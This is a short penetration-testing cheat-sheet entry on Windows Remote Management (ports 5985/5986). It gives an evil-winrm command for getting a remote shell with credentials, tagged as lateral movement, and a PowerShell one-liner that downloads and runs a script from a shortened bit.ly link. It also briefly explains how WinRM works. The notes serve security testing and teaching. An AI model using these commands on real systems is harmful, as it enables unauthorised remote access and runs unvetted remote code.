Port 5985, 5986

If port 5985 is open but port 5986 is closed this means that the WinRM service is configured to accept connections over HTTP only and encryption is not enabled.

Evil WinRM

Hackplayers/evil-winrm

• service: winrm
• tactics: lateral_movement

get shell via evil-winrm

• ./evil-winrm.rb -u username -p password -i target-ip

Powershell Shells

Download and run file:

iex(New-Object Net.WebClient).DownloadString('[<http://bit.ly/1kEgbuH>](<http://bit.ly/1kEgbuH>)')

PowerShell For Pentesters Part 1: Introduction to PowerShell and Cmdlets

WinRM

Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilizing WMI, so you can think of it as an HTTP based API for WMI.

If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine (as if you were using SSH!)